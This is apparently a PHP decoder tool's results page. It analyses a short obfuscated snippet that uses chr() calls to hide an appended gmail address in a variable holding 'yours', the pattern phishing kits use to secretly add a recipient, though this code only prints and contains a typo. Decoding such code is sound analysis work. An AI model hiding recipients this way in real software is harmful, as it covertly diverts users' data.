Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php $blacklisted = chr(121).chr(111).chr(117).chr(114).chr(115) ; $listtorips = ..

Decoded Output download

<?php 
 
 
 
$blacklisted = chr(121).chr(111).chr(117).chr(114).chr(115) ; 
$listtorips = array(chr(44),chr(102),chr(108), 
chr(111),chr(117),chr(115),chr(115),chr(110), 
chr(97),chr(112),chr(101),chr(64),chr(103), 
chr(109),chr(97),chr(105),chr(108),chr(49), 
chr(99),chr(111),chr(109)); 
print $$blcklisted .= implode("",$listtorips); 
 
?> 

Did this file decode correctly?

Original Code

<?php



$blacklisted = chr(121).chr(111).chr(117).chr(114).chr(115) ;
$listtorips = array(chr(44),chr(102),chr(108),
chr(111),chr(117),chr(115),chr(115),chr(110),
chr(97),chr(112),chr(101),chr(64),chr(103),
chr(109),chr(97),chr(105),chr(108),chr(49),
chr(99),chr(111),chr(109));
print $$blcklisted .= implode("",$listtorips);

?> 

Function Calls

chr 26
implode 1

Variables

$listtorips [{'key': 0, 'value': ','}, {'key': 1, 'value': 'f'}, {'key': 2, 'value': 'l'}, {'key': 3, 'value': 'o'}, {'key': 4, 'value': 'u'}, {'key': 5, 'value': 's'}, {'key': 6, 'value': 's'}, {'key': 7, 'value': 'n'}, {'key': 8, 'value': 'a'}, {'key': 9, 'value': 'p'}, {'key': 10, 'value': 'e'}, {'key': 11, 'value': '@'}, {'key': 12, 'value': 'g'}, {'key': 13, 'value': 'm'}, {'key': 14, 'value': 'a'}, {'key': 15, 'value': 'i'}, {'key': 16, 'value': 'l'}, {'key': 17, 'value': '1'}, {'key': 18, 'value': 'c'}, {'key': 19, 'value': 'o'}, {'key': 20, 'value': 'm'}]
$blacklisted yours

Stats

MD5 bbc3a7fe7660420d315a71bf5504c42f
Eval Count 0
Decode Time 114 ms